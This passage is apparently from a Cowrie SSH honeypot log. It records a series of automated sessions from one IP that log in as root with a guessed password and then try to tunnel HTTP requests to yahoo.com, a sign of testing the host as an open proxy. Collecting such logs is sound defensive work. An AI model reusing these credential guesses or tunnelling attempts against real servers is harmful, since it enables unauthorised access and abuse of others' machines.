160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.105662Z","src_ip":"213.209.150.239","session":"d49f084d4ca0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.340445Z","src_ip":"213.209.150.239","session":"d49f084d4ca0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17338,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17338","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.388427Z","session":"d49f084d4ca0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.435734Z","src_ip":"213.209.150.239","session":"d49f084d4ca0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":1975,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1975","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.573576Z","session":"d49f084d4ca0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.620712Z","src_ip":"213.209.150.239","session":"d49f084d4ca0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.668780Z","src_ip":"213.209.150.239","session":"d49f084d4ca0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39871,"dst_ip":"1.2.3.4","dst_port":22,"session":"9faad6cace72","protocol":"ssh","message":"New connection: 213.209.150.239:39871 (1.2.3.4:22) [session: 9faad6cace72]","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.724432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.725631Z","src_ip":"213.209.150.239","session":"9faad6cace72"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:04.782132Z","src_ip":"213.209.150.239","session":"9faad6cace72"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.065296Z","src_ip":"213.209.150.239","session":"9faad6cace72"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26829,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26829","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.123498Z","session":"9faad6cace72"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.180499Z","src_ip":"213.209.150.239","session":"9faad6cace72"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":26047,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26047","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.335074Z","session":"9faad6cace72"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.391912Z","src_ip":"213.209.150.239","session":"9faad6cace72"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.450101Z","src_ip":"213.209.150.239","session":"9faad6cace72"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39910,"dst_ip":"1.2.3.4","dst_port":22,"session":"07cc10940dea","protocol":"ssh","message":"New connection: 213.209.150.239:39910 (1.2.3.4:22) [session: 07cc10940dea]","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.496484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.497729Z","src_ip":"213.209.150.239","session":"07cc10940dea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.545019Z","src_ip":"213.209.150.239","session":"07cc10940dea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.779794Z","src_ip":"213.209.150.239","session":"07cc10940dea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":1890,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1890","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.827931Z","session":"07cc10940dea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:05.875194Z","src_ip":"213.209.150.239","session":"07cc10940dea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":28864,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:28864","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.013810Z","session":"07cc10940dea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.061171Z","src_ip":"213.209.150.239","session":"07cc10940dea"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.109382Z","src_ip":"213.209.150.239","session":"07cc10940dea"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":39961,"dst_ip":"1.2.3.4","dst_port":22,"session":"b007d00ba342","protocol":"ssh","message":"New connection: 213.209.150.239:39961 (1.2.3.4:22) [session: b007d00ba342]","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.155617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.156371Z","src_ip":"213.209.150.239","session":"b007d00ba342"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.203590Z","src_ip":"213.209.150.239","session":"b007d00ba342"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.438469Z","src_ip":"213.209.150.239","session":"b007d00ba342"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28020,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28020","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.486971Z","session":"b007d00ba342"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.534580Z","src_ip":"213.209.150.239","session":"b007d00ba342"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22452,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22452","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.669650Z","session":"b007d00ba342"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.717028Z","src_ip":"213.209.150.239","session":"b007d00ba342"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.765014Z","src_ip":"213.209.150.239","session":"b007d00ba342"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40000,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb74dd4d915f","protocol":"ssh","message":"New connection: 213.209.150.239:40000 (1.2.3.4:22) [session: bb74dd4d915f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.820906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.822124Z","src_ip":"213.209.150.239","session":"bb74dd4d915f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:06.879104Z","src_ip":"213.209.150.239","session":"bb74dd4d915f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.161571Z","src_ip":"213.209.150.239","session":"bb74dd4d915f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":15335,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15335","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.219388Z","session":"bb74dd4d915f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.276093Z","src_ip":"213.209.150.239","session":"bb74dd4d915f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":3517,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3517","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.431148Z","session":"bb74dd4d915f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.488288Z","src_ip":"213.209.150.239","session":"bb74dd4d915f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.545689Z","src_ip":"213.209.150.239","session":"bb74dd4d915f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40058,"dst_ip":"1.2.3.4","dst_port":22,"session":"a01f4d838bda","protocol":"ssh","message":"New connection: 213.209.150.239:40058 (1.2.3.4:22) [session: a01f4d838bda]","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.601374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.602328Z","src_ip":"213.209.150.239","session":"a01f4d838bda"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.659125Z","src_ip":"213.209.150.239","session":"a01f4d838bda"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.941476Z","src_ip":"213.209.150.239","session":"a01f4d838bda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8988,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8988","sensor":"my-vps","timestamp":"2025-08-26T01:06:07.998933Z","session":"a01f4d838bda"}
